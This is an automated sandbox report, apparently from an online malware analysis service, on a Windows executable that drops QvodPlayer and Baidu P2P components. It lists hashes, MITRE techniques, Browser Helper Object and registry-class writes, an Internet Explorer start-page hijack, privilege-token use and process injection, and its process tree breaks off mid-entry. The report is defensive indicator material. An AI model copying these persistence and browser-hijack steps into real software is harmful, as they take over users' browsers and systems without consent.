613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7

Analysis

max time kernel
58s
max time network
120s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
12-11-2024 23:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe
Size

4.5MB
MD5

3f2a7d832c6664b9a261c35750e5a320
SHA1

458a4eaebfce321135cb7ae13d642a8251648543
SHA256

613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7
SHA512

be5c370f49923763faca5f8e6e8916245060803eb2d9b29005e1b1f0b21caa9ee57cd74b6bc0e305f657530a5e3311148b3a767750d66252b3600c6915c0b4a8
SSDEEP

98304:6HBGxaeNoUAT49fZw2mZkfCR/4+CBtOyBOeVFA2VQXf:cB0am2THZkfk/2B5RV+f

Score

7^/10

adware discovery stealer upx

Malware Config

Signatures

Executes dropped EXE 6 IoCs

pid	Process
1984	kuaibo.exe
1224	qvodupdate.exe
484	qvodkunbang.exe
276	BaiduP2PService.exe
2140	sr.exe
2320	BaiduP2PService.exe

Loads dropped DLL 27 IoCs

pid	Process
2844	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe
2844	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe
1984	kuaibo.exe
2844	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe
1224	qvodupdate.exe
1224	qvodupdate.exe
2844	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe
2844	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe
2844	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe
2844	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe
2844	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe
2844	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe
484	qvodkunbang.exe
484	qvodkunbang.exe
276	BaiduP2PService.exe
276	BaiduP2PService.exe
276	BaiduP2PService.exe
484	qvodkunbang.exe
484	qvodkunbang.exe
2320	BaiduP2PService.exe
2320	BaiduP2PService.exe
2320	BaiduP2PService.exe
1984	kuaibo.exe
1984	kuaibo.exe
1984	kuaibo.exe
1984	kuaibo.exe
1984	kuaibo.exe

Installs/modifies Browser Helper Object 2 TTPs 8 IoCs

BHOs are DLL modules which act as plugins for Internet Explorer.

stealer adware

Modify Registry

T1112

Browser Extensions

T1176

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects	qvodupdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}	qvodupdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects	qvodupdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}	qvodupdate.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\NoExplorer = "1"	qvodupdate.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}	qvodupdate.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}	qvodupdate.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{B4F3A835-0E21-4959-BA22-42B3008E02FF}	qvodupdate.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2844-0-0x0000000000400000-0x000000000052A000-memory.dmp	upx
behavioral1/memory/2844-32-0x0000000000400000-0x000000000052A000-memory.dmp	upx
behavioral1/memory/2844-195-0x0000000000400000-0x000000000052A000-memory.dmp	upx

Drops file in Program Files directory 62 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\tools\	qvodupdate.exe
File opened for modification	C:\Program Files (x86)\Browser\config.ini	qvodkunbang.exe
File opened for modification	C:\Program Files (x86)\QvodPlayer\isWrite\	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\Codecs\MpaSplitter.ax	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\Codecs\QmvbSplitter.ax	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\Skins\Common\block.png	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\kuaibo.exe	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe
File created	C:\Program Files (x86)\QvodPlayer\PlayCtrl.dll	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\Skins\Common\play.png	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\Skins\Common\pro_head.png	kuaibo.exe
File opened for modification	C:\Program Files (x86)\QvodPlayer\	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe
File opened for modification	C:\Program Files (x86)\Browser\config.ini	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\QvodStatistic.xml	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\Codecs\real\cook.dll	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\Codecs\dsfVorbisDecoder.ax	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\Skins\Common\skin_insert.xml	kuaibo.exe
File created	C:\Program Files (x86)\tools\P2PStatReport.dll	qvodkunbang.exe
File created	C:\Program Files (x86)\tools\sr.exe	qvodkunbang.exe
File created	C:\Program Files (x86)\QvodPlayer\QvodPlayMedia.dll	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\Codecs\CoreAVC.ax	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\Codecs\QMVSplitterFilter.ax	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\Skins\Common\pause.png	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\Skins\Common\speed.png	kuaibo.exe
File created	C:\Program Files (x86)\tools\BaiduP2PService.exe	qvodkunbang.exe
File opened for modification	C:\Program Files (x86)\QvodPlayer\	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\Skins\Common\volume_bg.png	kuaibo.exe
File opened for modification	C:\Program Files (x86)\tools\isWrite\	qvodupdate.exe
File created	C:\Program Files (x86)\QvodPlayer\NetAgent.dll	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\QmvPlus.dll	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\Codecs\QvodSource.dll	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\Skins\Common\thrumpet_mute.png	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\Skins\Common\volume_has.png	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\QvodStatistic.dll	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\Codecs\real\raac.dll	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\Codecs\MP4Splitter.ax	kuaibo.exe
File opened for modification	C:\Program Files (x86)\tools\isWrite\	qvodkunbang.exe
File created	C:\Program Files (x86)\tools\P2SBase.dll	qvodkunbang.exe
File created	C:\Program Files (x86)\QvodPlayer\qvodupdate.exe	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe
File created	C:\Program Files (x86)\QvodPlayer\Skins\Common\thrumpet3.png	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\Skins\Common\stop.png	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\qvodkunbang.exe	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe
File opened for modification	C:\Program Files (x86)\Browser\config.ini	qvodupdate.exe
File created	C:\Program Files (x86)\tools\P2PBase.dll	qvodkunbang.exe
File created	C:\Program Files (x86)\QvodPlayer\NetUtil.dll	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\Codecs\real\drvc.dll	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\Codecs\RealMediaSplitter.ax	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\Skins\Common\controlbar_bg.png	kuaibo.exe
File opened for modification	C:\Program Files (x86)\tools\	qvodkunbang.exe
File created	C:\Program Files (x86)\QvodPlayer\QvodNet.dll	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\Codecs\real\pncrt.dll	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\Codecs\MatroskaSplitter.ax	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\Skins\Common\net_full_btn.png	kuaibo.exe
File opened for modification	C:\Program Files (x86)\QvodPlayer\isWrite\	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe
File created	C:\Program Files (x86)\QvodPlayer\dblite.dll	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\npQvodInsert.dll	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\QvodTerminal.exe	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\Codecs\FLVSplitter.ax	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\Codecs\real\drv2.dll	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\Codecs\QvodMpeg2Dec.ax	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\Codecs\QvodSound.ax	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\Codecs\VP8DecFilter.ax	kuaibo.exe
File created	C:\Program Files (x86)\QvodPlayer\tools.exe	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kuaibo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qvodupdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qvodkunbang.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BaiduP2PService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BaiduP2PService.exe

Modifies Internet Explorer settings 1 TTPs 7 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}\AppPath = "C:\\Program Files (x86)\\tools"	BaiduP2PService.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}\AppName = "BaiduP2PService.exe"	BaiduP2PService.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}\Policy = "3"	BaiduP2PService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\NavigatorPluginsList\QvodInsert	kuaibo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\NavigatorPluginsList\QvodInsert\application/qvod-plugin	kuaibo.exe
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main	kuaibo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}	BaiduP2PService.exe

Modifies Internet Explorer start page 1 TTPs 1 IoCs

stealer

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\Start Page = "http://url.cn/VfGpU7"	kuaibo.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\InprocServer32	qvodupdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\QvodInsert.DLL\AppID = "{2462C5DB-27C6-4CE8-81EF-3204D612A421}"	kuaibo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F3D0D36F-23F8-4682-A195-74C92B03D4AF}\ProgID	kuaibo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{329C81B5-1C8D-404E-BDC4-975046C1F878}	kuaibo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{329C81B5-1C8D-404E-BDC4-975046C1F878}\ = "IQvodCtrl"	kuaibo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{329C81B5-1C8D-404E-BDC4-975046C1F878}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	kuaibo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F3D0D36F-23F8-4682-A195-74C92B03D4AF}\Implemented Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4}	kuaibo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F3D0D36F-23F8-4682-A195-74C92B03D4AF}	kuaibo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F3D0D36F-23F8-4682-A195-74C92B03D4AF}\Programmable	kuaibo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F3D0D36F-23F8-4682-A195-74C92B03D4AF}\MiscStatus\ = "0"	kuaibo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{329C81B5-1C8D-404E-BDC4-975046C1F878}\ = "IQvodCtrl"	kuaibo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F3D0D36F-23F8-4682-A195-74C92B03D4AF}\InprocServer32\ThreadingModel = "Apartment"	kuaibo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F3D0D36F-23F8-4682-A195-74C92B03D4AF}\Control	kuaibo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F3D0D36F-23F8-4682-A195-74C92B03D4AF}\MiscStatus\1	kuaibo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F3D0D36F-23F8-4682-A195-74C92B03D4AF}\Version	kuaibo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C50D35A7-2515-4219-BC15-CBD2955EAE68}\1.0	kuaibo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}	qvodupdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F3D0D36F-23F8-4682-A195-74C92B03D4AF}\ = "QvodCtrl Class"	kuaibo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{329C81B5-1C8D-404E-BDC4-975046C1F878}\ProxyStubClsid32	kuaibo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F3D0D36F-23F8-4682-A195-74C92B03D4AF}\AppID = "{2462C5DB-27C6-4CE8-81EF-3204D612A421}"	kuaibo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F3D0D36F-23F8-4682-A195-74C92B03D4AF}\ToolboxBitmap32	kuaibo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{329C81B5-1C8D-404E-BDC4-975046C1F878}\TypeLib\ = "{C50D35A7-2515-4219-BC15-CBD2955EAE68}"	kuaibo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\QvodInsert.QvodCtrl.1\ = "QvodCtrl Class"	kuaibo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\QvodInsert.QvodCtrl\CurVer\ = "QvodInsert.QvodCtrl.1"	kuaibo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{490E61A7-0767-4CB2-BD78-C8944902CB4F}\TypeLib	kuaibo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{490E61A7-0767-4CB2-BD78-C8944902CB4F}\ = "_IQvodCtrlEvents"	kuaibo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{490E61A7-0767-4CB2-BD78-C8944902CB4F}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	kuaibo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{329C81B5-1C8D-404E-BDC4-975046C1F878}\TypeLib	kuaibo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Component Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4}	kuaibo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\QvodInsert.DLL	kuaibo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\QvodInsert.QvodCtrl\CurVer	kuaibo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F3D0D36F-23F8-4682-A195-74C92B03D4AF}\Version\ = "1.0"	kuaibo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C50D35A7-2515-4219-BC15-CBD2955EAE68}\1.0\FLAGS\ = "0"	kuaibo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{490E61A7-0767-4CB2-BD78-C8944902CB4F}\ = "_IQvodCtrlEvents"	kuaibo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{490E61A7-0767-4CB2-BD78-C8944902CB4F}\ProxyStubClsid32	kuaibo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{490E61A7-0767-4CB2-BD78-C8944902CB4F}\ProxyStubClsid32	kuaibo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Component Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4}	kuaibo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/qvod-plugin\CLSID = "{F3D0D36F-23F8-4682-A195-74C92B03D4AF}"	kuaibo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\ = "AccountProtect Class"	qvodupdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\InprocServer32\ = "C:\\ProgramData\\tools\\bdmanager.dll"	qvodupdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F3D0D36F-23F8-4682-A195-74C92B03D4AF}\InprocServer32	kuaibo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C50D35A7-2515-4219-BC15-CBD2955EAE68}	kuaibo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{490E61A7-0767-4CB2-BD78-C8944902CB4F}	kuaibo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F3D0D36F-23F8-4682-A195-74C92B03D4AF}\VersionIndependentProgID\ = "QvodInsert.QvodCtrl"	kuaibo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F3D0D36F-23F8-4682-A195-74C92B03D4AF}\TypeLib\ = "{C50D35A7-2515-4219-BC15-CBD2955EAE68}"	kuaibo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C50D35A7-2515-4219-BC15-CBD2955EAE68}\1.0\HELPDIR	kuaibo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{490E61A7-0767-4CB2-BD78-C8944902CB4F}\TypeLib\Version = "1.0"	kuaibo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\QvodInsert.QvodCtrl.1	kuaibo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\QvodInsert.QvodCtrl\CLSID	kuaibo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F3D0D36F-23F8-4682-A195-74C92B03D4AF}\MiscStatus\1\ = "131473"	kuaibo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C50D35A7-2515-4219-BC15-CBD2955EAE68}\1.0\ = "QvodInsert 1.0 ÀàÐÍ¿â"	kuaibo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C50D35A7-2515-4219-BC15-CBD2955EAE68}\1.0\FLAGS	kuaibo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C50D35A7-2515-4219-BC15-CBD2955EAE68}\1.0\HELPDIR\	kuaibo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{329C81B5-1C8D-404E-BDC4-975046C1F878}\TypeLib	kuaibo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{2462C5DB-27C6-4CE8-81EF-3204D612A421}\ = "QvodInsert"	kuaibo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\QvodInsert.QvodCtrl\ = "QvodCtrl Class"	kuaibo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F3D0D36F-23F8-4682-A195-74C92B03D4AF}\ProgID\ = "QvodInsert.QvodCtrl.1"	kuaibo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F3D0D36F-23F8-4682-A195-74C92B03D4AF}\MiscStatus	kuaibo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C50D35A7-2515-4219-BC15-CBD2955EAE68}\1.0\0\win32	kuaibo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{490E61A7-0767-4CB2-BD78-C8944902CB4F}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	kuaibo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{490E61A7-0767-4CB2-BD78-C8944902CB4F}\TypeLib\ = "{C50D35A7-2515-4219-BC15-CBD2955EAE68}"	kuaibo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{490E61A7-0767-4CB2-BD78-C8944902CB4F}\TypeLib\Version = "1.0"	kuaibo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{329C81B5-1C8D-404E-BDC4-975046C1F878}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	kuaibo.exe
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000_Classes\Local Settings	qvodupdate.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1224	qvodupdate.exe
1224	qvodupdate.exe
484	qvodkunbang.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1224	qvodupdate.exe
Token: SeDebugPrivilege	1224	qvodupdate.exe
Token: SeDebugPrivilege	484	qvodkunbang.exe

Suspicious use of WriteProcessMemory 27 IoCs

description	pid	Process	procid_target
PID 2844 wrote to memory of 1984	2844	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe	28
PID 2844 wrote to memory of 1984	2844	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe	28
PID 2844 wrote to memory of 1984	2844	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe	28
PID 2844 wrote to memory of 1984	2844	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe	28
PID 2844 wrote to memory of 1224	2844	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe	29
PID 2844 wrote to memory of 1224	2844	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe	29
PID 2844 wrote to memory of 1224	2844	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe	29
PID 2844 wrote to memory of 1224	2844	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe	29
PID 2844 wrote to memory of 1224	2844	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe	29
PID 2844 wrote to memory of 1224	2844	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe	29
PID 2844 wrote to memory of 1224	2844	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe	29
PID 2844 wrote to memory of 484	2844	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe	31
PID 2844 wrote to memory of 484	2844	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe	31
PID 2844 wrote to memory of 484	2844	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe	31
PID 2844 wrote to memory of 484	2844	613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe	31
PID 484 wrote to memory of 276	484	qvodkunbang.exe	32
PID 484 wrote to memory of 276	484	qvodkunbang.exe	32
PID 484 wrote to memory of 276	484	qvodkunbang.exe	32
PID 484 wrote to memory of 276	484	qvodkunbang.exe	32
PID 484 wrote to memory of 2140	484	qvodkunbang.exe	33
PID 484 wrote to memory of 2140	484	qvodkunbang.exe	33
PID 484 wrote to memory of 2140	484	qvodkunbang.exe	33
PID 484 wrote to memory of 2140	484	qvodkunbang.exe	33
PID 484 wrote to memory of 2320	484	qvodkunbang.exe	37
PID 484 wrote to memory of 2320	484	qvodkunbang.exe	37
PID 484 wrote to memory of 2320	484	qvodkunbang.exe	37
PID 484 wrote to memory of 2320	484	qvodkunbang.exe	37

C:\Users\Admin\AppData\Local\Temp\613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe
"C:\Users\Admin\AppData\Local\Temp\613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe"
1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2844
- C:\Program Files (x86)\QvodPlayer\kuaibo.exe
  "C:\Program Files (x86)\QvodPlayer\kuaibo.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Modifies Internet Explorer start page
  - Modifies registry class
  PID:1984
- C:\Program Files (x86)\QvodPlayer\qvodupdate.exe
  "C:\Program Files (x86)\QvodPlayer\qvodupdate.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Installs/modifies Browser Helper Object
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1224
- C:\Program Files (x86)\QvodPlayer\qvodkunbang.exe
